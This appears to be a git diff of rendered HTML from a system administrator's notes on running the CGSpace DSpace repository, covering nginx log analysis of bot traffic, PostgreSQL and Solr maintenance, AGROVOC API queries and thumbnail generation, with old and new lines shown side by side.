<li>I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:</li>
</ul>
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png=&#39;cover.png&#39;
$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
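$ # sketch (untested): the same two-step pipeline over a whole directory of PDFs
$ for pdf in *.pdf; do inkscape &#34;$pdf&#34; -z --export-dpi=72 --export-area-drawing --export-png=&#34;${pdf%.pdf}.png&#34;; gm convert -resize x600 -flatten -quality 85 &#34;${pdf%.pdf}.png&#34; &#34;${pdf%.pdf}.jpg&#34;; done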
</code></pre><ul>
<li>I&rsquo;ve tried a few times this week to register for the <a href="https://www.evisa.gov.et/">Ethiopian eVisa website</a>, but it is never successful</li>
@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<ul>
<li>Last night Linode sent a message that the load on CGSpace (linode18) was too high; here&rsquo;s a list of the top users at the time and throughout the day:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018:1(5|6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018:1(5|6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
225 40.77.167.142
226 66.249.64.63
232 46.101.86.248
@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
962 66.249.70.27
1193 35.237.175.180
1450 2a01:4f8:140:3192::2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1141 207.46.13.57
1299 197.210.168.174
1341 54.70.40.11
@ -345,9 +345,9 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li><code>35.237.175.180</code> is known to us (CCAFS?), and I&rsquo;ve already added it to the list of bot IPs in nginx, which appears to be working:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03
4772
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
630
</code></pre><ul>
<li>I haven&rsquo;t seen <code>2a01:4f8:140:3192::2</code> before. Its user agent is some new bot:</li>
@ -356,9 +356,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12
</code></pre><ul>
<li>At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03
5111
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
419
</code></pre><ul>
<li><code>78.46.79.71</code> is another host on Hetzner with the following user agent:</li>
@ -368,9 +368,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2
<li>This is not the first time a host on Hetzner has used a &ldquo;normal&rdquo; user agent to make thousands of requests</li>
<li>At least it is re-using its Tomcat sessions somehow:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03
2044
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>In other news, it&rsquo;s good to see my re-work of the database connectivity in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> actually caused a reduction of persistent database connections (from 1 to 0, but still!):</li>
@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<li>Linode sent a message that the CPU usage of CGSpace (linode18) was too high last night</li>
<li>I looked in the logs and there&rsquo;s nothing particular going on:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1225 157.55.39.177
1240 207.46.13.12
1261 207.46.13.101
@ -403,9 +403,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
</code></pre><ul>
<li>But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05
6980
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05 | sort | uniq | wc -l
1156
</code></pre><ul>
<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> appears to be the CKM dev server where Danny is testing harvesting via Drupal</li>
@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<li>Linode alerted me twice today that the load on CGSpace (linode18) was very high</li>
<li>Looking at the nginx logs I see a few new IPs in the top 10:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;17/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;17/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
927 157.55.39.81
975 54.70.40.11
2090 50.116.102.77
@ -505,7 +505,7 @@ $ ls -lh cgspace_2018-12-19.backup*
</code></pre><ul>
<li>Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p &#39;fuu&#39; -d
Connected to database.
Fixed 466 occurences of: Copyrighted; Any re-use allowed
</code></pre><ul>
@ -519,7 +519,7 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
# pg_dropcluster 9.6 main
# pg_upgradecluster 9.5 main
# pg_dropcluster 9.5 main
# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.5 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>I&rsquo;ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments</li>
<li>Run all system updates on CGSpace (linode18) and restart the server</li>
@ -528,13 +528,13 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
<pre tabindex="0"><code>$ dspace cleanup -v
- Deleting bitstream information (ID: 158227)
- Deleting bitstream record from database (ID: 158227)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(158227) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(158227) is still referenced from table &#34;bundle&#34;.
...
</code></pre><ul>
<li>As always, the solution is to delete those IDs manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);&#39;
UPDATE 1
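$ # sanity check (sketch): this should now return zero rows
$ psql dspace -c &#39;SELECT bundle_id FROM bundle WHERE primary_bitstream_id IN (158227, 158251);&#39;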
</code></pre><ul>
<li>After all that I started a full Discovery reindex to get the index name changes and rights updates</li>
@ -544,7 +544,7 @@ UPDATE 1
<li>CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat</li>
<li>The top IP addresses as of this evening are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
963 40.77.167.152
987 35.237.175.180
1062 40.77.167.55
@ -558,7 +558,7 @@ UPDATE 1
</code></pre><ul>
<li>And just around the time of the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &quot;29/Dec/2018:1(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &#34;29/Dec/2018:1(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
115 66.249.66.223
118 207.46.13.14
123 34.218.226.147

View File

@ -12,7 +12,7 @@
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -38,7 +38,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -141,7 +141,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -155,14 +155,14 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
</code></pre><ul>
<li>Analyzing the types of requests made by the top few IPs during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 54.70.40.11 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 54.70.40.11 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
30 bitstream
534 discover
352 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 207.46.13.1 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 207.46.13.1 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
194 bitstream
345 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 46.101.86.248 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 46.101.86.248 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
261 handle
</code></pre><ul>
<li>It&rsquo;s not clear to me what was causing the outbound traffic spike</li>
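<li>One way to find out would be to sum the response bytes per IP from the same logs (a sketch, assuming nginx&rsquo;s default combined log format where <code>$body_bytes_sent</code> is the tenth field):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{bytes[$1]+=$10} END {for (ip in bytes) print bytes[ip], ip}&#39; | sort -rn | head -n 10
</code></pre>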
@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<ul>
<li>Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don&rsquo;t see anything around that time in the web server logs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Jan/2019:1(7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Jan/2019:1(7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 207.46.13.192
217 31.6.77.23
340 66.249.70.29
@ -313,33 +313,33 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [
&#34;results&#34;: [
{
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;soil&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;soil&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_7156&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_7156&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
}
],
&quot;uri&quot;: &quot;&quot;
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>The API does not appear to be case sensitive (searches for <code>SOIL</code> and <code>soil</code> return the same thing)</li>
@ -359,23 +359,23 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [],
&quot;uri&quot;: &quot;&quot;
&#34;results&#34;: [],
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>I guess the <code>results</code> object will just be empty&hellip;</li>
@ -386,28 +386,28 @@ $ . /tmp/sparql/bin/activate
$ pip install sparql-client ipython
$ ipython
In [10]: import sparql
In [11]: s = sparql.Service(&quot;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&quot;, &quot;utf-8&quot;, &quot;GET&quot;)
In [12]: statement=('PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; '
...: 'SELECT '
...: '?label '
...: 'WHERE { '
...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
...: 'FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) . '
...: '} LIMIT 10')
In [11]: s = sparql.Service(&#34;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&#34;, &#34;utf-8&#34;, &#34;GET&#34;)
In [12]: statement=(&#39;PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; &#39;
...: &#39;SELECT &#39;
...: &#39;?label &#39;
...: &#39;WHERE { &#39;
...: &#39;{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } &#39;
...: &#39;FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) . &#39;
...: &#39;} LIMIT 10&#39;)
In [13]: result = s.query(statement)
In [14]: for row in result.fetchone():
...: print(row)
...:
(&lt;Literal &quot;fish catching&quot;@en&gt;,)
(&lt;Literal &quot;fish harvesting&quot;@en&gt;,)
(&lt;Literal &quot;fish meat&quot;@en&gt;,)
(&lt;Literal &quot;fish roe&quot;@en&gt;,)
(&lt;Literal &quot;fish conversion&quot;@en&gt;,)
(&lt;Literal &quot;fisheries catches (composition)&quot;@en&gt;,)
(&lt;Literal &quot;fishtail palm&quot;@en&gt;,)
(&lt;Literal &quot;fishflies&quot;@en&gt;,)
(&lt;Literal &quot;fishery biology&quot;@en&gt;,)
(&lt;Literal &quot;fish production&quot;@en&gt;,)
(&lt;Literal &#34;fish catching&#34;@en&gt;,)
(&lt;Literal &#34;fish harvesting&#34;@en&gt;,)
(&lt;Literal &#34;fish meat&#34;@en&gt;,)
(&lt;Literal &#34;fish roe&#34;@en&gt;,)
(&lt;Literal &#34;fish conversion&#34;@en&gt;,)
(&lt;Literal &#34;fisheries catches (composition)&#34;@en&gt;,)
(&lt;Literal &#34;fishtail palm&#34;@en&gt;,)
(&lt;Literal &#34;fishflies&#34;@en&gt;,)
(&lt;Literal &#34;fishery biology&#34;@en&gt;,)
(&lt;Literal &#34;fish production&#34;@en&gt;,)
</code></pre><ul>
<li>The SPARQL query comes from my notes in <a href="/cgspace-notes/2017-08/">2017-08</a></li>
</ul>
@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
</li>
<li>I am testing the speed of the WorldFish DSpace repository&rsquo;s REST API and it&rsquo;s five to ten times faster than CGSpace as I tested in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
0.16s user 0.03s system 3% cpu 5.185 total
0.17s user 0.02s system 2% cpu 7.123 total
@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
</code></pre><ul>
<li>In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high; here are the top IPs in the logs around those few hours:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;14/Jan/2019:(17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;14/Jan/2019:(17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 31.6.77.23
192 54.70.40.11
202 66.249.64.157
@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For 2019-01 alone the Usage Stats are already around 1.2 million</li>
<li>I tried to look in the nginx logs to see how many raw requests there are so far this month and it&rsquo;s about 1.4 million:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
1442874
real 0m17.161s
@ -859,30 +859,30 @@ WantedBy=multi-user.target
<li>I think I might manage this the same way I do the restic releases in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>, where I download a specific version and symlink to some generic location without the version number</li>
<li>I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;33&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;33&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>I opened an issue on the GitHub issue tracker (<a href="https://github.com/ilri/dspace-statistics-api/issues/10">#10</a>)</li>
<li>I don&rsquo;t think the <a href="https://solrclient.readthedocs.io/en/latest/">SolrClient library</a> we are currently using supports this type of query, so we might have to just do raw queries with requests</li>
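<li>Something like this minimal sketch with the requests library, for example (assuming the same local port forward to Solr as above; untested against our production cores):</li>
</ul>
<pre tabindex="0"><code>import requests

# raw query against the statistics core, bypassing the SolrClient library
params = {
    &#39;q&#39;: &#39;type:2 id:11576&#39;,
    &#39;fq&#39;: [&#39;isBot:false&#39;, &#39;statistics_type:view&#39;],
    &#39;rows&#39;: 0,
    &#39;wt&#39;: &#39;json&#39;,
}
r = requests.get(&#39;http://localhost:3000/solr/statistics/select&#39;, params=params)
print(r.json()[&#39;response&#39;][&#39;numFound&#39;])
</code></pre><ul>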
<li>The <a href="https://github.com/django-haystack/pysolr">pysolr</a> library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):</li>
</ul>
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
print(results.facets['facet_fields'])
{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;, &#39;facet&#39;: &#39;true&#39;, &#39;facet.field&#39;: &#39;id&#39;, &#39;facet.mincount&#39;: 1, &#39;facet.limit&#39;: 10, &#39;facet.offset&#39;: 0, &#39;rows&#39;: 0})
print(results.facets[&#39;facet_fields&#39;])
